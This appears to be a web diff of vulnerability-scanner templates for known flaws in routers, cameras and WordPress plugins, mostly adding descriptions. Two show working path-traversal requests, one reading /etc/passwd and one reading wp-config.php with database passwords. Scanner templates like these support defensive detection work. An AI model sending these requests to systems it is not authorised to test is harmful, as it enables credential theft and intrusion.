reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
|
||||
tags: ecoa,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /viewlog.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
|
||||
author: gy741
|
||||
severity: high
|
||||
description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
|
||||
description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
|
||||
reference:
|
||||
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
|
||||
- https://www.fatpipeinc.com/support/advisories.php
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: GeoVision Geowebserver 5.3.3 - LFI
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/50211
|
||||
description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files.
|
||||
reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
|
||||
tags: geowebserver,lfi
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: GeoVision Geowebserver 5.3.3 - XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/exploits/50211
|
||||
description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
|
||||
reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
|
||||
tags: geowebserver,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: h3c-imc-rce
|
||||
|
||||
info:
|
||||
name: H3c IMC Rce
|
||||
name: H3c IMC RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
|
||||
reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
|
||||
tags: rce,h3c-imc
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
author: Udyz
|
||||
name: Hasura GraphQL Engine - postgresql query exec
|
||||
severity: critical
|
||||
description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
|
||||
reference: https://www.exploit-db.com/exploits/49802
|
||||
tags: hasura,rce
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Hiboss RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter.
|
||||
reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994
|
||||
tags: hiboss,rce
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
|
||||
reference:
|
||||
- https://cxsecurity.com/issue/WLB-2020100038
|
||||
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it.
|
||||
reference: https://cxsecurity.com/issue/WLB-2020030185
|
||||
tags: wordpress,wp-theme,redirect
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Wordpress brandfolder plugin - RFI & LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/39591
|
||||
- https://cxsecurity.com/issue/WLB-2016030120
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: brandfolder-open-redirect
|
||||
|
||||
info:
|
||||
name: Wordpress brandfolder plugin Open Redirect
|
||||
name: WordPress Brandfolder Plugin Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
|
||||
reference: https://www.exploit-db.com/exploits/39591
|
||||
tags: wordpress,wp-plugin,lfi,rfi
|
||||
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: cherry-file-download
|
||||
|
||||
info:
|
||||
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
|
||||
- https://github.com/CherryFramework/cherry-plugin
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Wordpress Plugin Issuu Panel - RFI & LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
|
||||
reference: https://cxsecurity.com/issue/WLB-2016030131
|
||||
tags: wp-plugin,wordpress,lfi,rfi
|
||||
|
||||
|
|
Loading…
Reference in New Issue